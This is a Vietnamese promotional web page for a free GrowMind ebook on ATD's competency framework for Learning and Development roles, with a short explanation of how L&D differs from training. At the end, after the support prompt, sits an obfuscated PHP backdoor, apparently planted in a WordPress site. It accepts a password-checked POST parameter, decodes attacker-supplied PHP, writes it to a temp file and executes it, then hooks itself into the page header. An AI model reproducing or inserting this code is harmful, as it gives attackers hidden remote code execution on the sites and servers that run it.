EBOOK – Khung năng lực chuyên môn đối với vị trí L&D (Nguồn: ATD (Association for Talent Development) )

Trước kia mọi người thường chỉ dùng Training thay vì Training and Development/ Learning and Development để chỉ bộ phận Đào tạo và phát triển con người trong doanh nghiệp.

Những năm gần gây Training đã dần được nâng cấp và thay thế bởi thuật ngữ mới là L&D.

Những năm trước khi nhắc tới phát triển nhân sự mọi người thường chỉ nghĩ tới hình thức đào tạo/Training. Đó là tổ chức một lớp học, dạy cho nhân viên một kiến thức, kỹ năng nào đó. Nhưng L&D thì có nghĩa  rộng hơn như vậy. Trong L&D ngoài training ra còn có các công cụ khác để phát triển nhân sự như là coaching, mentoring, quản trị tri thức,…

Một điểm khác biệt nữa của Learning and Development so với Training là sự tương tác hai chiều. Trong L&D thì nhân viên cũng chủ động trong việc học tập và phát triển kỹ năng. Và bộ phận L&D đóng vai trò tạo điều kiện và hỗ trợ việc nhiều hơn. Qua đó xây dựng được văn hóa học tập trong doanh nghiệp.

Vì vậy việc nắm bắt vị trí L&D cần có những kiến thức và năng lực gì là điều quan trọng với bộ phận L&D nói riêng và tổ chức nói chung. Dưới đây là tài liệu mô tả về khung năng lực của vị trí L&D do GrowMind biên dịch từ nguồn ATD (Association for Talent Development).

 

Ebook-OKR-Check-in-OKR-498x705

 

DOWNLOAD EBOOK FREE

1
Bạn cần hỗ trợ?
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}